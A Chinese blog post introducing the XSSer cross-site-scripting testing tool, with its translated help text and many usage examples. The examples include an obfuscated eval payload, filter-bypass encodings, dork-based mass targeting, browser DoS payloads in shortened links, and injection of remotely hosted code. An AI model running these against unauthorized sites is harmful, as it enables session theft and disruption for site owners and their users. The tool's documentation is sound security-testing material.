原创 2011年01月18日 10:25:00

   XSSer,开源渗透测试工具,由python开发,ubuntu 10。04系统。安装:下载:http://sourceforge.net/projects/xsser/files/xsser-1.0.tar.gz/download,下载deb包,傻瓜安装。

     XSSer版本:XSSer v1.5 (beta)






  --version             显示xxser程序版本号


administrator@ubuntu:~/下载/xsser-public$ ./XSSer.py --version

XSSer v1.0: "The Mosquito" // (2010) - (Copyright - GPLv3.0) // by psy


  -h, --help            显示帮助内容
  -v, --verbose       verbose (default: no)尚未理解
  -s                       统计所有尝试注入到站点到回应。show statistics with all injection attempts responses
  -w                      输出文件结果到dat模板。 output all results directly to template (XSSlist.dat)
  --xml=FILEXML  将结果输出xml文件 output 'positives' to aXML file (--xml filename.xml)
  --publish             output 'positives' to Social Networks (identi.ca)
  --short=SHORTURLS     output -final code- shortered (tinyurl, is.gd)
  --imx=IMX             create a false image with XSS code embedded
  --fla=FLASH           create a false .swf file with XSS code embedded
  --check               send a hash to pre-check if target repeats all content
                        recieved (usefull to reduce 'false positive' results)
  --launch              launch a browser at the end, with each 'positive'
                        final code injection(s) discovered

  *选择目标Select Target(s)*:
    设置测试目标,必须至少定义一个选项:At least one of these options has to be specified to set the source to
    get target(s) urls from. You need to choose to run XSSer:

    -u URL, --url=URL   Enter target(s) to audit 输入审计目标
    -i READFILE         Read target urls from a file支持从文件中读取目标
    -d DORK             Process search engine dork results as target urls通过搜索引擎将结果作为目标urls
    --De=DORK_ENGINE    Search engine to use for dorking (duck, altavista,
                        bing, baidu, yandex, yebol, youdao, google, yahoo)

  *Select type of HTTP/HTTPS Connection(s)*:
    These options can be used to specify which parameter(s) we want to use
    like payload to inject code.

    -g GETDATA          Enter payload to audit using GET. (ex: '/menu.php?q=')
    -p POSTDATA         Enter payload to audit using POST. (ex: 'foo=1&bar=')
    -c CRAWLING         Crawl target hierarchy parameters (can be slow!)
    --Cw=CRAWLER_WIDTH  Number of urls to visit when crawling (deeping level)

  *Configure Request(s)*:
    These options can be used to specify how to connect to target(s)
    payload(s). You can select multiple:

    --cookie=COOKIE     Change your HTTP Cookie header
    --user-agent=AGENT  Change your HTTP User-Agent header (default SPOOFED)
    --referer=REFERER   Use another HTTP Referer header (default NONE)
    --headers=HEADERS   Extra HTTP headers newline separated
    --auth-type=ATYPE   HTTP Authentication type (value Basic or Digest)
    --auth-cred=ACRED   HTTP Authentication credentials (value name:password)
    --proxy=PROXY       Use proxy server (tor: http://localhost:8118)
    --timeout=TIMEOUT   Select your Timeout (default 30)
    --delay=DELAY       Delay in seconds between each HTTP request (default 8)
    --threads=THREADS   Maximum number of concurrent HTTP requests (default 1)
    --retries=RETRIES   Retries when the connection timeouts (default 3)

  *Select Vector(s)*:
    These options can be used to specify a XSS vector source code to
    inject in each payload. Important, if you don't want to try to inject
    a common XSS vector, used by default. Choose only one option:

    --payload=SCRIPT    OWN  - Insert your XSS construction -manually-
    --auto              AUTO - Insert XSSer 'reported' vectors from file

  *Select Bypasser(s)*:
    These options can be used to encode selected vector(s) to try to
    bypass all possible anti-XSS filters on target(s) code and some IPS
    rules, if the target use it. Also, can be combined with other
    techniques to provide encoding:

    --Str               Use method String.FromCharCode()
    --Une               Use function Unescape()
    --Mix               Mix String.FromCharCode() and Unescape()
    --Dec               Use Decimal encoding
    --Hex               Use Hexadecimal encoding
    --Hes               Use Hexadecimal encoding, with semicolons
    --Dwo               Encode vectors IP addresses in DWORD
    --Doo               Encode vectors IP addresses in Octal
    --Cem=CEM           Try -manually- different Character Encoding mutations
                        (reverse obfuscation: good) -> (ex: 'Mix,Une,Str,Hex')

  *Special Technique(s)*:
    These options can be used to try to inject code using different type
    of XSS techniques. You can select multiple:

    --Coo               COO - Cross Site Scripting Cookie injection
    --Xsa               XSA - Cross Site Agent Scripting
    --Xsr               XSR - Cross Site Referer Scripting
    --Dcp               DCP - Data Control Protocol injections
    --Dom               DOM - Use Anchor Stealth (DOM shadows!)

  *Select Final injection(s)*:
    These options can be used to specify the final code to inject in
    vulnerable target(s). Important, if you want to exploit on-the-wild
    your discovered vulnerabilities. Choose only one option:

    --Fp=FINALPAYLOAD   OWN    - Insert your final code to inject -manually-
    --Fr=FINALREMOTE    REMOTE - Insert your final code to inject -remotelly-
    --B64               B64    - Base64 code encoding in META tag (rfc2397)
    --Dos               DOS    - XSS Denial of service (client) attack!!

  *Special Final injection(s)*:
    These options can be used to execute some 'special' injection(s) in
    vulnerable target(s). You can select multiple and combine with your
    final code:

    --Onm               ONM - Use onMouseMove() event to inject code
    --Ifr               IFR - Use <iframe> source tag to inject code

Examples of usage:

* Simple injection from URL:

$ python XSSer.py -u "http://host.com"

* Simple injection from File, with tor proxy and spoofing HTTP Referer headers:

$ python XSSer.py -i "file.txt" --proxy "" --referer "666.666.666.666"

* Multiple injections from URL, with automatic payloading, using tor proxy, injecting on payloads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat):

$ python XSSer.py -u "http://host.com" --proxy "" --auto --Hex --verbose -w

* Multiple injections from URL, with automatic payloading, using caracter encoding mutations (first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):

$ python XSSer.py -u "http://host.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"

* Advance injection from File, payloading your -own- payload and using Unescape() character encoding to bypass filters:

$ python XSSer.py -i "urls.txt" --payload 'a="get";b="URL(/"";c="javascript:";d="alert('XSS');/")";eval(a+b+c+d);' --Une

* Injection from Dork selecting "duck" engine (XSSer Storm!):

$ python XSSer.py --De "duck" -d "search.php?"

* Injection from Crawler with deep 3 and 4 pages to see (XSSer Spider!):

$ python XSSer.py -c3 --Cw=4 -u "http://host.com"

* Simple injection from URL, using POST, with statistics results:

$ python XSSer.py -u "http://host.com" -p "index.php?target=search&subtarget=top&searchstring=" -s

* Multiple injections from URL to a parameter sending with GET, using automatic payloading, with IP Octal payloading ofuscation and printering results in a "tinyurl" shortered link (ready for share!):

$ python XSSer.py -u "http://host.com" -g "bs/?q=" --auto --Doo --short tinyurl

* Simple injection from URL, using GET, injecting a vector in Cookie parameter, trying to use a DOM shadow space (no server logging!) and if exists any "hole", applying your manual final payload "malicious" code (ready for real attacks!):

$ python XSSer.py -u "http://host.com" -g "bs/?q=" --Coo --Anchor --Fr="!enter your final injection code here!"

* Simple injection from URL, using GET and trying to generate with results a "malicious" shortered link (is.gd) with a valid DoS (Denegation Of Service) browser client payload:

$ python XSSer.py -u "http://host.com" -g "bs/?q=" --Dos --short "is.gd"

* Multiple injections to multiple places, extracting targets from a list in a FILE, applying automatic payloading, changing timeout to "20" and using multithreads (5 threads), increasing delay between petitions to 10 seconds, injecting parameters in HTTP USer-Agent, HTTP Referer and in Cookie parameters, using proxy Tor, with IP Octal ofuscation, with statistics results, in verbose mode and creating shortered links (tinyurl) of any valid injecting payloads found. (real playing mode!):

$ python XSSer.py -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "" --Doo -s --verbose --Dos --short "tinyurl"

* Injection of user XSS vector directly in a malicious -fake- image created "on the wild", and ready to be uploaded.

$ pyton XSSer.py --Imx "test.png" --payload "!enter your malicious injection code here!"

* Report output 'positives' injections of a dorking search (using "ask" dorker) directly to a XML file.

$ python XSSer.py -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml"

* Publish output 'positives' injections of a dorking search (using "duck" dorker) directly to http://identi.ca
(federated XSS pentesting botnet)

$ python XSSer.py -d "login.php" --De "duck" --publish

* Examples online:

- http://identi.ca/xsserbot01
- http://twitter.com/xsserbot01

* Create a .swf movie with XSS code injected

$ python XSSer.py --imx "name_of_file"

* Send a pre-checking hash to see if target will generate -false positive- results

$ python XSSer.py -u "host.com" --check

* Multiple fuzzing injections from url, including DCP injections and exploiting our "own" code, spoofed in a shortered link, on positive results founded. XSS real-time exploiting.

$ python XSSer.py -u "host.com" --auto --Dcp --Fp "enter_your_code_here" --short "is.gd"

* Exploiting Base64 code encoding in META tag (rfc2397) in a manual payload of a vulnerable target.
$ python XSSer.py -u "host.com" -g "vulnerable_path" --payload "valid_vector_injected" --B64

* Exploiting our "own" -remote code- in a payload discovered using fuzzing and launch it in a browser directly
$ python XSSer.py -u "host.com" -g "vulnerable_path" --auto --Fr "my_host/path/code.js" --launch


If you want to contribute to XSSer development reporting a bug, providing a patch, commenting on the code base or simply need to find help to run XSSer first refer to the xsser documentation, then surf the xsser mailing list (Xsser-users@lists.sourceforge.net) online archives and if you still have something to say, do that on the appropriate xsser mailing list. If nobody gets back to you, then drop me an e-mail (root@lordepsylon.net - epsylon@riseup.net).

If you discover any vulnerability in a software using XSSer, please add to the report a link to this site.



  • 2016年06月24日 14:48


转自 xxx.com ======================================================================= BackTrack 5 R...
  • xihuanqiqi
  • xihuanqiqi
  • 2012-10-15 11:25:10
  • 5946


Xsser是一个可命令行也可图形化的工具,集成了大量绕过服务器过滤机制的方法。下面就直接上命令了~ 基本命令用法: 以DVWA的Xss反射型漏洞为例: xsser -u "http://10.10....
  • SKI_12
  • SKI_12
  • 2017-03-04 17:01:53
  • 1491


http://www.myhack58.com/Article/html/3/8/2013/36603.htm  1.什么是Beef Beef是一个强大的Xss专业安全工具,不像其他的...
  • mydriverc2
  • mydriverc2
  • 2014-12-16 17:02:58
  • 1719


一、下载源码 地址: http://download.csdn.net/detail/u011781521/9722570 下载之后解压出来会有这么些文件 把这些文件复制到网站目录...
  • u011781521
  • u011781521
  • 2016-12-27 16:26:27
  • 8356


简介: =============================================================== 跨站脚本者是一个自动框架,检测,利用和报告基于Web应用XS...
  • s98
  • s98
  • 2012-10-24 21:09:33
  • 1138


  • u014621518
  • u014621518
  • 2017-08-30 10:25:00
  • 422


那个broken web application 后续会慢慢研究的。。。先把工作任务完成。。 工作任务1:搜索类似演示网站 http://code.google.com/p/websecuri...
  • xysoul
  • xysoul
  • 2015-04-21 14:13:54
  • 4366

<em>xsser</em>.me 源码

<em>xsser</em>.me已开源,网站的源代码打包下载... <em>xsser</em>.me已开源,网站的源代码打包下载 综合评分:4 收藏(8)评论(42)举报 所需: 3积分/C币 下载个数: 409 开通VIP ...
  • 2018年04月22日 00:00


   XSSer,开源渗透测试工具,由python开发,本人使用ubuntu 10。04系统。因为ChenZhiDe 老师要求毕业设计中要使用多种渗透测试工具,在sourceforge  上找了好一段...
  • ronghua_liu
  • ronghua_liu
  • 2011-01-18 10:25:00
  • 8031